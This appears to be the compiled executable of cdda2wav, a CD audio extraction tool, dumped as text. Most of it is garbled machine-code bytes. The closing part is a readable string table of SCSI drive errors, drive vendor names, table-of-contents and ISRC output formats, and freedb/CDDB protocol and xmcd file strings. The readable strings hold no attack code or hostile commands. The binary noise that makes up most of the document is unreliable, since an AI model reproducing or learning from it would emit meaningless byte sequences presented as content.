t$$4Ë(11<$~ )‰Љ9T$43\$$aTC9J)‰.BD D$ $lD$ 9u\$D$$V<$} )f@D$ BD$BD$B$3KD$ T$$rdD$ B D$B D$B$e3yD$D$w$覄UWVS<EU]uEU D$D$eE1<$!DU D$D$D$ T$|$$>f  "t3   ‹tttXC$E D$D$D$ D$|$$=FFk$1t} u?1Ue3U<[^_]Ðt&C$~ofD$D$<$BC$D$D$ |$$D$k$1jD$$ALU D$D$D$ T$|$$xrt$   ‰$0E D$ |$$D$x,6FFsvt&UWVS<(ueE1D$D$$AD$D$D$ D$\$4$ fD$$ X\$̀D$D$\$ D$|$4$xpD$$l6\$|$$61Ue3u`<([^_]ÍvF$tF(~D$$>뽸붋F$uD$$>'UWVSE u}EE^@EEED$D$l$?ESUCT{CC CF ¸SUMu }Ѓ ‰SUCXN(t3Ut=D$$">|$E$&D$蠅FDu[^_]뼍vU$t$u=] MUEt$t$]E͉EEΈ]ϋ@D$ D$ |$D$4$ Ue3u ]u}] U8uu}}މ]eE1^@D$D$l$=CUCTCCC CV;CX ЈCUFD4$>x4$u<$)‰T$芃1҉ЋUe3u ]u}]&US]$.vt$!vt 1[]Ít&$Xv!t$$Kv uډ$~v []É$gvu []É$Pvu'US]$ut1{$~[]É$裈1[]É$uuՉ$ut$ut $uuf뭍&'U]]u}C$$Bxk$]u}]É$ S$ƅBC$y׋E 1S$etO$;} tL$yC@@(uՉ$t$Etu}:t}0u{$~k$1dk$S$pڍ&'UWVS<E eU1ҋ]D$D$4$:|$D$D$D$t$ D$D$*$,uA$suD$<$nu1ۋUe3<[^_]Ët~vFfV  t=~FfV t=~)ًAt \$4$D$H]}$}ufCt&'U(]]uu }}eE1C$D$$Tk$t9QAtf yv5AfQ 1tUe3u#]u}]ÍvAfQ |&U(}} uu]fxDGD$D$4$5ЃD$ xt&1]u}]ÐD$<4$pu܉4$q4$qt:t0ufxD$D$$6D$!$6o'Uuu]^@4$6x]u]Ív1{ 4$ptG4$pu 4$pt<4$p$ "y4$yƉ4$y몉4$fpp'UWVS,u} eE1F$4$n$D$D$$6F$D$D$ ?D$ \$4$6DžD$D$$r6V u+n$Ue3,[^_]ÍD$D$ ?D$\$4$8xD$h$<v9v.t&D$p$?D$uC\9w$ *v:t&N   ‰D$D$$S5D$D$ D$ \$4$Kn$DžD$=$D$uD$L$  ‰T$tD$Z$  ‰T$tx'U8uu }=eE1]]9tC$$Wu%k$5Ue3u@]u}]ÍD$D$ ?D$D$$!wUWVS,}eE1<tUe3 ,[^_]Í$D$D$m3D$<$G$\$<$Ko$t$<$tD$v$7sB< < D$$ s$w2AuD$ D$D$$r2BuD$ D$D$$r2AuD$ D$D$$[r2BuD$ D$D$$%r2AuD$ D$D$$q2BuD$ D$D$$q2AuD$ 'D$D$$q2B uD$ 9D$D$$Mq2A uD$ LD$D$$q2BuD$ `D$D$$p$ 5q2AuD$ uD$D$$p2B uD$ D$D$$ip2AuD$ D$D$$3pBt.2uD$ T$D$$o2yxD$ $D$D$$o2B@uD$ D$D$$o2AuD$ LD$D$$Uo2zxD$ D$D$$o2AuD$ D$D$$nBt.2uD$ xT$D$$n2A uD$ D$D$$wn2B@uD$ D$D$$An2A uD$ D$D$$ n2BuD$ #D$D$$m2AuD$ =D$D$$m$ m2BuD$ XD$D$$]mAZ$ mBD$D$$ D$ m2AuD$ D$D$$l2BuD$ PD$D$$l2AuD$ |D$D$$hl2BuD$ D$D$$2l2AuD$ D$D$$k2BuD$ D$D$$k2AuD$ D$D$$k$ kPf@  ¸#QfA ¸Pf@ ¸zRfA ¸+谱zA Q D$[D$gЉD$ $jxxXf@D$T$ ӉT$^jf1 |$D$m$/jFfFD$$ ډ\$jFD$$D$iغ.D$$T$i^D$ $ T$i9E\$D$P$D$ED$ED$ >OoUWVSu]}U~Ft#FFFxF F V C$$k$tG@|$ D$Et$$D$x[^_]fC$$k$@D$ D$Et$$D$8yS$1uE D$$D$ Et$$D$yT1[^_] UWVSLEU]EUE U$eE1҉tCuDžD$D$$> C$$RU D$t$D$T$ $-~u C`$E D$$D$ T$D$C(k$u=p3 $ E$)D$T$RpC(tG|$$D$Rrk$~GK$1uD$$D$ Ue3)L[^_]Ívu0D$$T$N KyD$$D$' uGt09|?9E t7U D$D$$T$T$ k$ttlD$D$$ C$$E k$D$D$ $T$D$C(tlD$D$$ C$$3E k$D$D$ $T$D$8C(tlD$D$$ C$$E k$D$D$ $T$D$莾C(>D$D$$/ C$$CE k$D$D$ $T$D$K(!$A$)T$D$COD$P$T$p[L$3A$)‹T$D$N$A$)‹T$D$NL$@$)‹T$D$N1D$_$T$ 1D$$T$]1D$-$T$d1D$B$T$?USE]D$E $EE SE[]HI&UEt@(u$D$D$S$IɃáD$D$$|D$ CJ뵐UEtP(u,D$5D$$D$ JÐt&D$$D$$D$ I}0 tD$"D$$D$ I|&UWVS,E] t H(R῵NȾD$S Uk<)ЉʈEkKM)¸RU Uk<)kKU)ED$M$Gt $2F,[^_]Í&U\$ D$ D$DD$$D$ D$Iv'USE] t@(uN\$D$"S$Ft&uu|C8tDE[]F[]áD$+D$$XD$ G닡D$%D$$D$ G땉D$\$ D$D$$C$+Jt&'UWVSE}uE 5t O(1ۡD$D$S$EED$ED$E $ ty~W$u]$ DD$E D$ED$ED$4D$D$ $Bu[^_]É[^_]Í&D$%D$$D$ KFD$ED$XD$D$ $BWAft #D$?D$$D$ Et&'UVS E] t p(tbt 1[^]áD$SD$$!DuЋD$ C \$s$8FFCEED$D$ S$CtbT@8$B$GfD$3D$$|D$ D EYAEAUE ˆQEAEAECECECECECEC [^]áD$%D$$D$ *DD$ D$D$$@$F&UWVS Et x(OED$D$S$VB}1&FC\$D$S$BE 9wÍvvDƀƀT$D$S$Ao}T1@FC\$D$S$vAE 9wÍv@vDƀLƀNT$D$S$#Aƒ11ۍ@|FV D$ <$ +T$D$+D$+D$+DD$+@ D$;|u@Ĝ [^_]Ã<8tv$0?$DD$$D$$D$ ^AD$FD$ D$$D$$1=$ CD$%D$$D$ A`D$FD$ D$x1D$ D$D$$<$ \$|$$=9tEU]u}]=]u}]ÍvD$'D$$D$ ?\UStED$$D$@@UEM%  D$SD$$=UMãE%  NQX@U$`S, PON0Nt[]Ívv$[>Cs< O< GD$ 4$u%Z(:u):Fu*:F8$+%D$ D$ D$$%~D$@$}t&$X$D$$(UD$s$[<< /< i< 'f$5N $e'CD$ D$ D$4$h$D$ 4$#W'D$ 4$u#ljD$4$D$ $'D$ 4$"#caD$ 4$#U(]1u1҃;t ]u]EE9uEU]u]Ít&ED$ $t<*t7 tp;utW_hyɍCD$D$$~ _h딋GhtU[^_]+u[^_]ÍUS]te M1ɉ$PD$ D$ D$$,Ue3ut[]5"t&UWVS1ۃuUPhE~R9ƉZ\$|$$UBh)9~$)؉D$D$E$~9܃[^_]É뢋UE[^_]&UWVSeE1ɉ~81t&)~ދ$9ϋEe3u [^_]!vUuƉMMeE1]}$PE]D$ D$ D$$EC<vQAEt+F ~ED$D$$PUe3u ]u}]Y M$PFM$PUD$ D$ D$$~8Nt1҉Åt1=~ $ى;F ~%EUD$ED$T$ D$$ozU@'U(]]Mu}׉E$'t$\$<$9t EsME]u}]v'U}}]ueE1Wht5uE D$D$P4$D$ @Q@ډ4$/Ue3u ]u}]UEPhtE]]Ð&UEPhtE2%]]Ð&U(uu]U eE1M}]Fht"xɐt&x xf~Ue3ub]u}]Ë8x܋t҉\$L$T$ D$D$5D$$C$VU}}eE1U ]uGht x~1Ue3uM]u}]Ð0PT$ D$D$JD$$dR$SU}}]ueE1Wht5uE D$ZD$P4$D$ `ډ4$Ue3u ]u}]1UWVS|EeU1҉p@‹@hR&FD$FD$F D$FD$FD$gD$@D$ $6ËF ߉D$؉D$FT$t~ Fg1P|$D$$9t~-\$D$$9tXxF)؉F?F +F$F( FLx FL $N+1Ft~$1ۋUe3uo|[^_]Ív^@{\$1ۉD$$T1F 뒅h17v'US]Clt$gChCltx u []ÍvE؃[]&UWVS|}eE1Gh0]U D$D$P$T$ $y]WhE;~K=]?fE-=E~(D$\$ D$D$4$jxƋWhE99}Y=]fE-=E~(D$\$ D$D$4$xƋWhE9|bE $ÉGlUe3um|[^_]ÉO `D$D$$WhE=_ ~ED$$D$Yq1{<$vpt&'U}}u]Ghtot$Ghǀt$Ghǀt$Ghǀx u1]u}]Ít&ډ$&;ƋGhǀ$$Gh붉'U]]u}׉EL$ eE1$D$D$PE$Ɖ$tE4$Ue3u ]u}]&'Ut$u$E ^hu 1$t$]à w$Xdٸҋt,t.뮋t31ɉ^h^h뻹^h붍&'UE]U u}xe M1ɋXpp txx,~>pBtMe3 ]u}]Ãxp_h)ttttxpBttD$D$$yt&$9xt$\$ D$ L$D$$e0tD$:$j D$ D$D$$D$:$t D$0v$ UD$@$`c)=\$vD$ D$ D$$pA ~-t$|$ D$h$D$$$-f04$ED$ D$D$$Ai||j$D$$DtD$$+Z$b$t$D$5$bpGtD$D$$ۉ0Dž1$‰Gh@ǂǂǂǂǂǂǂdދ$G $ $ ||p|BhB T]D$D$P$|$ |p$|p\|ƋpI|p8|Ëp%\$t$D$ p$epBhǀDž1$Q9t$ 9tB$v/$ D$\$$ pD$@$WD$T$L$ D$@D$$U |Dž2D$$GXD$$p|$$% ID$$L$$ D$$d D$$P D$$< D$/<$ tPT$D$L$D$D$ D$<$ |$$ $A $$) 'U(E D$D$D$$D$D$ D$D$k1ÐUUM tM U]Htt ɸt1]Ít&UE]JfUuu]] \$4$P~9FT؉^X]u]Ét&U]] uu 1]u]É\$4$9\$4$PFpՍ'US]$PCp[]ÐUE]J fUE]J(fUE]J,fUE]J0fUU EPd]fUE]@@@fUE@@Px@])Ë@]Ít&UE@@H uP$t ]fx(ux+]Í&'UE]@@@(ÐUSEX@$1҅u[]C+o~C-؍'USEX@$K1҅tC+Ѓo~S7[]Ív'USEX@$ tC+o~ C8[]Ã1[]ÍUuu}} ]Fx^|)Å~\$D$<$/<$F|Fx؋u]}]fU1Mt T$ $Í'UWVSE] }D$D$ \$E$xqu)ƋExjE3&T$ D$$\$4$x6)ËEE9Et.B^vD$[\$4$ryʃ[^_]D$\$4$Rx+E[^_]UWVSE] }D$D$ \$E$xQu)ƋExJE&)ËEE9Et*D$<\$4$D$ y΃[^_]D$\$4$x+E[^_]UED$BD$ED$ E D$E$"UE@@P TD$ ED$OT$D$E $ɉ!ÐUWVSE}U X@C(EC(D$U|$$D$ xfu )ƀ{(xo{)C(vRxC(f%f=t2T$L$ D$|$4$x+E [^_]Í&$UBD$]|$4$D$ Jx)ǀ{)jUBD$]|$4$D$ x)>E;1'c U(]]ueE1D$t$$i~$D$t$$?$Ee3u ]u]U8Eu}}]X@$PƋC~Cu1ҋ]Ћu}]ÉD$D$E t$t$ D$ |$$xċE ЃdE~d)׋UD$D$|$$D$ \xU+U |t&'UMb(}}uu]G@O`@D$Y)ډT$D$@t$D$ E $)x(] Ã(~)Ɖt$\$<$xÉ+E ]u}]U(Euu}} ]X@C~Ct1ҋ]Ћu}]Í&D$D$ D$lt$<$xȍECd~dD$)D$t$D$ E$xU)녍t&'U18uu]]}~(F@@D$FD$F D$FD$FDD$\$D$ E $x@} )É\$4$lj|$fx%ǃ~(~)É\$|$4$xlj+E ]u}]Uuu]^|+Vt\$4$)ЉD$"É^|]u]ÍvUS$]EEK|D$E D$YʉD$ +St $)ЉD$x C|$[]ÐC|$[]fUVS] u{C~Ct&D$D$@4$Ѓv)T$D$Y4$E u[^]$D$4$[vD$4$Ѓwtm&D$4$`Ѓf<D$34$.3D$4$@CD$64$D$'4$D$ 4$D$4$D$4$D$4$D$4$sD$4$^D$4$IpD$4$4[D$4$FD$4$ 1D${4$D$k4$D$4$D$24$D$4$D$a4$D$Y4$wD$T4$bE &<`[D$H4$3Z&'UED$$Ít&UWVS }E u]D$D$<$t&T$D$$<$xB^vD$[<$E } [^_]UED$ E D$ED$$XÍUWVSE}]EE D$<$D$$Ex$1D$<<$D$;uuE }[^_]fUED$BD$ E D$E$iÍ&UE D$ED$$Í'UED$ E D$ED$$ÍUE@@P TD$$OT$Ð&U(E]up@$ËF~Fu ]u]ÉD$D$\$ \$D$ $d~dD$$D$&]u]ÍUSEX@C~Ct[]ÉD$ D$D$l$SCd~dD$$D$[]Ív'UMbVS ]C@K`@D$q)T$ D$@D$${(~$ [^]ܰUWVS|EU e M1ɋux@EUrG t::t*9]D$ D$D$@$ڋMAD8tD$ET$D$ t$D$G$$x9])ƋUt$É$\$x)ƃ G(u/+UЋUe3|[^_]øwG+EGLUt$$D$ T$xËM)֍G(D$ED$L$ t$\$$RymEMbH`GD$Y)ډT$]D$D$@$D$ tMt$\$ $:)fU(E]] u}}$pt3]tx'<[^_]ËUBht.xοNjU E9~ʉƋU 븋U E멐UXM̋M]Éuu}}ɉUx\Ủ)ЋUE t!]Ћu}]Í&UЍED$D$S$&1҅uʋC ~$ED$D$ ED$$赳ED$ED$S$EK ЉUԉUɉUԉE~3D$ET$UD$D$ET$ D$$6EỦU܋EEU tEԉtU؉fEWv'Uuu}} ]F ~|$D$$課UÍ$(1҅tFlFh]Ћu}]Ít&UWVS UJhRhEE1B EPh&1ۋE4Drx$EPhfDruσuŃE}u1t$$UBhǀǀ1 [^_]UWVS UZhRhEE9tJfDŽB1v1ۋE4Drx$EPhfDruσuŃE}ut"$EPhǂǂxNfDŽzE1ۉE4Drx$SEPhfDruσE}u1 [^_]Ív'U(U]M u}t9Zht;Rx9t0t`t ft.1]u}]Ã$tt߅ɸtҋ xȉؾQؿhD$)kdD$$)ЉD$ )ωi'|$ ))ˉ\$,Vɸ>IBUED$@t$Í'UWVS\U MEt$$eE1T$u%=`t1Me3 \[^_]Ët$$L$u%=D$$L$y 1󫍍D$d $gt,D$d$DuD$$譟D$$號D$$腟D$$q1D$ D$T$$pqcN:TO:BDP:B4Q:B$2t?:W:CG:C7:C'D$ D$ D$$vD$ D$ D$1)Љ$>D$ D$ D$1)Љ$D$ D$ D$1)Љ$1)Ћ:u):Bu:Bu:Bt ֹ28u1y(d1ۋQh&Z <t-9uZ!9uZ 9u6؋f|BL$\$ D$T$D$L$茜1t&D$D$ $@=dƄDžfM/ $Ë! t€u҃+D $$D$ $D8/D$/ $@T$$hD$PD$<$t$ $t*1ۉt$$duoEZK:u0[:Bu$\:BuD~ DŽhtTu11t ${tuDžt_ƅDt0D$D$d4$D$D4$D$up$=L$ D$8T$D$$蝙1T$ D$|$T$o1T$ \$D$l$8DžU! t€u҃+A$tD$$!vD$D$$Ƅ ZfDž/$uDž$NCDžaƒ(҉҉Ѓ({fLBZ  Z PhZ Z! ȈZ  y T$(T$\$ D$$D$T$\$L$ D$D$$G$u1G G  蠇>G$1G UWVS$$eE1$Rp@҉(~ $JhB;$V;P4t($Jh;U$X ~'FT$$D$D$ $4~?H,FG$@lV0$4D$D$$$y40C$PhC ~1ҍvD2TD$9Fu)T;$9tFT$ $D$]~$@@(\$T$$չ;@t'@D$T$ $BD$ D$w$Ph;C4(\$D$$WFtK$9tFT$ $D$蛇C F F${ 2F F$)F{$P(~Fx ~?C$D$C D$CD$CD$ D$D$$"$1ɋP49Vt (G1ɋUe3[^_]Ë$@h8 ӋF,8;艶 뗋@FDž4$0F{N(F+FLD$CD$$8N$F$1F F$KnB܉),$F(]D$D$l$vF+EFEEEEEEVU ЉڈEًFE܋$zkF+EFL]V$<$[~$B`t<;StHF F(F$F o,$D$$T$ل,xF$F .$BX8<$肹8$H ~,‹@XD$ BhD$D$$]$@h8u$B`($P4(Tv'Uh}}]uWw@x$Ghf~)]u}]Ív1F F$ލ]D$D$@$tESFEF EFEFEEčFTEȍF+EiFM\$ED$"G$iËG ~\$D$~$ZEF(EFLG ~&ED$8D$ ED$$ÀEfthfft&^<$G`; u5x,F$F #E1~EF ~$uF$EF1_EtMF$uF$~+t9~(u3FLF(uFL~-u~7u~8uF(F+FLF t뉉<$~KG`>F(F Z/F$t&u"t t&|t&Whfxufǂsv'Uuu]}eE1V^@?{ ~-C 1C$Ue3]u}]Í}D$D$,<$qUD$D$@$qCECtEK ~1Ґt&DT:9S CEԋEЋC@E8EEiC|$D$SEF$n Ct.3M9t%UԋC9wqD$L$4$軳EԋS9wPC xOC(1CC C$CDEEL)ЉC몉닋C$E܀8uxtC$tES+CLEC+EBEBEB EBEBEBEC(BE@t 3C C( #t&|C$~ |$D$`$|ʳu t vtE1UU EP4]fUS]C\t$WC`t$HC@t$9t$'t$Cht$$^Ctt$][]fUVS1ۃ$ʲD$D$$nD$ D$D$4$ FF4FL$_F\ty$LF`tf$l9F@tS$&Ftt@FxF|$$t$u 4$1e[^]ÍUS]$n$61[]Í&'U]uut5`$$t$$P賍t$$P$]1u]Ðt&UWVSLU Ee M1Dž҉tUMP H,ƅt>1Dž11҃ `t5D$4$yD$ D$D$$uurU~4CD$C D$CT$D$ D$ $4yL$$費Ue3L[^_]ËtD$t$$xu[CD$C D$ CD$pD$$x-T$L$$D$ uufD$D$$Qx넋D$D$$D$ }u1t勵󦋍8uG΍D$L$$EF<(<:ƅD$:4$詪<@rD$,$fDžDžDžDžDž?Q11҃t(Ctt!D$ uD$t$$w$14&uD$t$$wD$:$3YD$:$CG<,1Dž+~ DžD$ $t$D$ΧƄ5D$,4$qD$ $T$`EDž/t/T$UL$ D$D$T$ $Dv菦1D$<$b8,tPt͉|$ D$ut$$uDž1ɋfDž1ɀxPBD$<$bb8;ԥM1ۋ|$ D$L$4$MuDžD$$D$E$D$a,t<U|$ D$T$ $tnDžPxD$$Ya8u'Dž |$ D$9U(]]uu }}tE|$t$$D$ R$UCs{ S]u}]ÐUWVSMEu }t{1ېt&t9tuB9uB[^_]Ã@t}MpuV|$ D$t ED$U$GsE[^_]Ã|r=bX1u~*t$ D$9띉|$ D$ 돉|$ D$D 끉t$ D$9p'UWVSueE1}] MЃoadDžlDžpDžxE/DžX:Dž\ :Dž`DžhDžtDž|EEE4:UPU P Ð&UVS]C D$C$[ۉt4$D$[u[^]ÍU]>&US]t2t$t>C t$e>C][]Q>[]Ív'UVSM ]ɋs u29t:9^tBStCBCtPn][^]=$V 9uƋC9^uvCF붐&UED$@$tfUWVS }G$tv$H9;t!uD$G$) [^_]É$Ս&UVS]s F;C$~$R$zF;C$[^]Ít&'UVS]u t$t$u][^]<UWVS }7G@GD4$D$'4$&9}$\$4$ 'uCD$4$*'GD̓DtlG@GH4$D$9'-t'\$4$&uCD$4$&GHuكHt [^_]É4$N&GH [^_]É4$&GD뇍UD$]uu }}$7;D$p$C D$`$zsiC0C($C;C|ǃC$C,C<<$%C8C@$a؋u]}]fUuu]}~tEE$D$:]ۉE ?\$D$$#EF]u}]Ë]ۉ$s: Uuu }}]]Ox9~ ]u}]Í39|9x;ۍv~))ٍ D$3BD$r$L)_뺍&))뿍t&U]]uu D$$t$Zs]u]Í'U(}} E]upxY9UE$D$8UEE94?UED$E$D$ĕEUP]u}]ËE)?6D$D$EB$F륋U҉U$8U뇍'U $t$|$U u}Mҋ^x29|% E} U$t$|$]f)Ջ$t$|$]ÐUWVStxX t2C;PUx ffu3u1Ʌ۸FtCȉF9}V[^_])M}˃[^_]Ë 빐UEE ]A+BÍt&'UU EP<]fUUiE BL]Ít&U(}ǃ]ӉuEGt_G tHH9ItPP)D$$6\$ƉD$G $44$L7E$C]u}]Ít&UWVS\EU@0REȋEŰUۀ5}E fEm]mB<u싂'toыU )Bt8t P9U EP@)ʋEH8B9~9EX4Ѓ 9}UCB4~B4U41B<tdiEȘD$$5E܋E$U$E @yQ$@y<@0Ep@E$BU$ @EɉEx @'to )iE0 U$EM5=@1҉E؃E)׋U}҉}4EEEE]̋HH9~ȉ))ËEPDD;9~Z)U9E}])ӋE~ E+E9~ÅEąiE0 UEԉ\$ |$D$$9É!ƋEt>iD$ $UU)ED$Ui0 iE0 EԉT$$轎E܅t%iUiEED$T$$葎tEE܅t%EtiEE܃H uE4;Up8F;BD}tiƘD$-$U]U9UquE$m3UЉU$T$UԉT$E؉$3UiEĘ+UЉBiEBE܉B EЃ\[^_]ËE@U9~ul}A]Ѕt UЉ$qM؅t E؉$3UEtU܉$2E댉x ))@QM'UE}} ]]ut t]s@t$$et1C${@CC Cs@$sH]u}]Ë$48뙐US]$?C,$#9][]2UWVS MuIhDND؃@Fr <tVV9> GVˋ~+9~ t^)߅Nt2 $D$h]DKw tF+9}tF+UB9|(uȃF9~}<$dO)ff; ]<<^ٍ4BÃ;M;]WFf9tՋ8ύ&M}G9G9GBB t0t$C uF$!!}_<$Qۉ\$4$D$}GD$G4$D$B y<$AE9MDž ˺+V<94st r0 0QY$(+89hUB9@[9x)\$8$CD$F $f(8W tJ)ȉD$T$ hdD$h $ +0t0$u4$E9MDžUft+V tBD$ $U苅H 1txT$ D$,T$0 $0RUU@ t Ah;CT$ ,0|$D$<$cu8ύ010EEUlt(P tBD$ $R ҉tBh;AE|$؉D$$UB$^MƋAD$A4$D$0EX$o4$ۉ\$D$yR Zt+S tBD$ $UډT$,t$0<$Vt6U7ut/P tBD$ $U苍A 1ɅtT$ <ҍY)ЉD$t$0<$uE808<t4A t't!?t ;u|U$5E9M%tvlx5D{ˍTJEUxxEmEmf9tۃ;lủ}}HTz4KˉUEU9l~9X~EEPFf9tϋE+Ẽ@8`7u)ˋ`+\`}؉D$ \$hLD$h$?$t˺+F<t/S tBD$ $U䋵v tFE ]D$ T$L$$C<1ۋV19} A 0 0tAu^9}'A u  Au9|@uy1JD$ D$ MD$T$ $_V9\H tBAt:‹QL9}&H 9wgfffꋅ)9U;]9]{L_}P$E Y fEm]mE싓9~E uD$ $U H UBt$>D$A$u]M ؉sMEM ;vyyE tD$<$U uF< | DžH $؋M ;U@$lTuQˋIT$D$؃L$ D$D$F,$Tl9 E tD$B$U lCsQlƉK9~9Љ}u+v,4h9VR +A]l^ t+F4B8) r9ll$R4)։Ű(rf;Jl+F4B\$L$4$D$ r t&l4lR +H,v )ӉUȋ]XL 4l4v@PlTE\6`UV\f;NX4!XϋUTUUDE`TP\UUDHEuHuCx;x7]uf;u)E0EEmm!mtzT9U;Pu`\sf;JsJ]EHX0L0!Ш9)@M 4T$ $ 9l$lt 91ۅnًP 9;7{9Dž1zQp1!‰;L$~D$ 2D$Et$$;>v])@4u]uȋB]܋]}+0E)΋M t$LD$L$ $lM܋x))9ʉ}5ft($肵$*u$螱t$B$花u[]US]CCǃC t$?C][]kU1]É'U uu]}u1]u}]Í4$NÍ@ D$$@D$sLt$@N@ uƀ@\$D$@4$Pu끍t&US ]t$UK][]81[]U t$)KÍ&U1 t$M Ív'US ]t$Mt!$D$YK []Ð $SM1 []ÐUWVS }]u  t>~"<$Kyy";u uv<$vKt&x߃ u+E [^_]É'UE D$ED$$oÐU(EEED$ED$E $cu1D$ED$E$AIx܋ET$$D$ÐU(uu]]}} 4$t"4$Hu]]} }E]I\$t$ D$<$L4$Oڅu]Ћu}]É4$uD$$DŐUWVSE$|G5X9|T2&Љ)9}΋\tevD$$dHXljD$)Ѝ@RD$$PE=\5X$[^_]Ív$LD$\$lj$ D$ |$$u[^_]Ít&UVSu4$}F;X}M[\څt&92t"Ru$ Kt‹CBSE 2B[^]É몍'US]$E;X}*@\t9t @t9u@[]Ã[]01[]Ð&Uuu]] 4$uu É] ]]U$HÐUWVS }?6vu$4$E |$D$E$Hxσ [^_]UWVS1ۃ}u EECfu7E$SE|$t$$F|t )E~׋][^_]ÐUWVSMu< t1< t-<+<-Eu(90f < uŃ< u1u$8P9}(ƍ<tB< vݍB<Zv#vEtߋE 8[^_]Íw P멍vP랃EJE;&ÉD$$`;U<+<=tPtOtW&t2(?FuVFty,ttft?t*u~ vt&UBE쉕9PF뎋}t 4Ctc<-v{M1ҋ} UBE쉕<VCUEDž҉E1t1:ut&:t9u9 fBQu}ÉD$$`9uoWOȃ+<vuOD$$8t3~/1:u:\  9u,t)E&,uߋ] UBE艕<1 tZ<,QI'%s'...child pid is %d percent_done: 0%fork error.BD@DD,GBNDOG A@F???@@R@!Dkȴݴ} .o0O0o.%s is not a device %s is not a char device %s is not a block device /dev/cannot stat device %s HELP. %s%sCannot open SCSI driver. Make sure you are root.while opening %s :Could not fstat %s (fd %d): WORMSONY CD-RW CRX100E 1.0MMC+CDDA MMC-CDDA no MMC TOSHIBAIBMDEC CD-ROM XM- CD-ROM XM-3401IMSKODAKRICOHHPPHILIPSPLASMONGRUNDIG CDR100IPWMITSUMI CD-R NRCYAMAHAPLEXTORSONYCD-ROM CDU55E5022.0rMATSHITADEC RRD47 (C) DEC HITACHI CDR-7930wrong interface (cooked_ioctl) for this device (%s) set to generic_scsi cdrom device (%s) is not of type generic SCSI. Setting interface to cooked_ioctl. For possible targets try 'cdda2wav -scanbus'.%s Use the script scan_scsi.linux to find out more. Probably you did not define your SCSI device. Set the CDDA_DEVICE environment variable or use the -D option. You can also define the default device in the Makefile. For possible transport specifiers try 'cdda2wav dev=help'. Race condition attempted in OpenCdRom. Exiting now. Too low on memory. Giving up. Inquiry command failed. Aborting... this is neither a scsi cdrom nor a worm device Type: %s, Vendor '%8.8s' Model '%16.16s' Revision '%4.4s' load cdrom please and press enterCould not change sector size from %d to 2048 No memory for SCSI structure. shmgetshmat failed for %d bytes 12345678901234567890shmctl failed to detach shared memory segment Cannot get mmap for %d Bytes on /dev/zero. cannot create pipe parent to childcannot create pipe child to parentcannot allocate local bufferresample.cpDst >= pStartwrite(audio, 0x%p, %u) = %d Probably disk space exhausted4&o?\{)X?Y@?SaveBufferscsibus%d: %d,%d,%d%3d) HOST ADAPTOR %c '%.8s' '%.16s' '%.4s' NON CCS No target found. Warning: wrong track types found: patching to audio... No memory for index lists. Index positions will not be written in info file! Could not get position information (%02x) for sectors %d, %d, %d: switching ReadSubChannels off ! Driver and/or firmware bug detected! Drive cannot play the very last sector (%u)! track mismatch: %1d, in-track subchannel: %1d (index %1d, sector %1d) broadcast type conflict detected -> TOC:%s, subchannel:%s track type conflict detected -> TOC:%s, subchannel:%s difference: TOC:%s, subchannel:%s correcting TOC... difference: TOC:%s, subchannel:%s preemphasis correcting TOC... Analysis of track %d skipped due to unknown length Could not find index transition for pre-gap. track %2d has %d indices, index table (pairs of 'index: frame offset') %1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X%1.1X Media catalog number: %13.13s No media catalog number present. unknown mode 3 entry C1=0x%02x, C2=0x%02x Illegal ISRC for track %d, skipped: -%.1X%.1X-%.1X%.1X%.1X%.1X%.1XOff=%4d, ind=%2d/%2d, unknown Id=%2u, len=%2u DATAtrack recorded copy-permitted tracktype %2d-%2d %13.13s %14.14s data AUDIOtrack pre-emphasis copy-permitted tracktype channels %2d-%2d %12.12s %14.14s audio %1c Table of Contents: total tracks:%u, (total time more than %u:%02u.%02u) Table of Contents: total tracks:%u, (total time %u:%02u.%02u) Table of Contents: starting sectors CD with illegal leadout position detected! The cdrom drive firmware does not permit access beyond the leadout position! Switching index scan and ISRC scan off! Audio extraction will be limited to track %ld with maximal %ld sectors... Restrictions apply, since the size of the last track is unknown! cddb cannot resolve freedb host: bad status from freedb server during sign-on banner: %s Warning: Space in user name '%s'. Warning: Nonascii character in user name '%s'. Warning: Space in hostname '%s'. Warning: Nonascii character in hostname '%s'. bad status from freedb server during hello: %s bad status from freedb server during proto command: %s 200 CDDB protocol level: current 1, supported bad status from freedb server during proto x: %s bad status from freedb server during query: %s %sbad status from freedb server during read: %s cddb read finished not correctly! bad status from freedb server during quit: %s Warning: first track has negative start sector! Setting to zero. http://www.musicbrainz.org/dtd/CDInfo.dtd %d %s %s %s data track %s data track data track # # Disc length: %lu seconds # nonbroadcastcopyright protectedunprotectedwithoutwith track: %.2d, index: %.2d time: %.2d:%.2d.%.2d seeking index start ... index scan: %d...%2u: N/A T%02d I%02u N/A %2u:%6lu T%02d I%02u %06lu scanning for MCN...0000000000000 scanning for ISRCs: %d ...Recorder-ID encountered: %.1X%.1X%.1X%.1X%.1X%.1X%.1X%02x 00-000-00-00000 T: %2d ISRC: %15.15s Disc identification: %s Read_Subinfo no memory(%d) incrementaluninterrupted %2u.%c%2u:%02u.%02u%c, %2u.(%8u) lead-out(%8u)CDINDEX discid: %s CDDB discid: 0x%08lx CDDBP titles: resolved CD-Text: detected CD-Text: not detected CD-Extra: detected CD-Extra: not detected Album title: '%s' [from %s]Track %2u: '%s'Tracks:%u > %u:%02u.%02u Tracks:%u %u:%02u.%02u from '%s' T%02d: %7u %2u:%02u.%02ucopydeniedcopyallowed data %s %s N/Aquadropre-emphasizedlinear audio %s %s %s title '%s' from Leadout: %7u socket read error: fd=%d, ptr=%p, nbytes=%d . DTITLE= / TTITLEDYEARDGENRE# Revision: cddb socket failed: freedb.freedb.orgtcpcddbp-altcddbpcddb connect failed: 200 201 cddb hello unknownproto supported proto %1u cddb query %08lx %ld 210 211 %u entries found: %02u: %s %02u: ignore please choose one (0-%u): %umultiple entries found: %s 202 no cddb entry found: %s %s %xcddb read %s %08x quit 230 %08lX\\\t\nCD001CDPLUSINFO.CDP;1.cdindex %s %s .cddb# xmcd # # Track frame offsets: # # %lu # Revision: %u # Submitted via: cdda2wav DISCID=%08lx DTITLE= DYEAR=%4u DYEAR= DGENRE=%s TTITLE%d=TTITLE%d= EXTD= Copyright EXTD=EXTT%d= PLAYORDER= ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿIIKJIJHI@JIIIIIIII0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno!B c0@P`p)Jk1s2R"RBrb9{ZӜb$C4 dtDTjK( 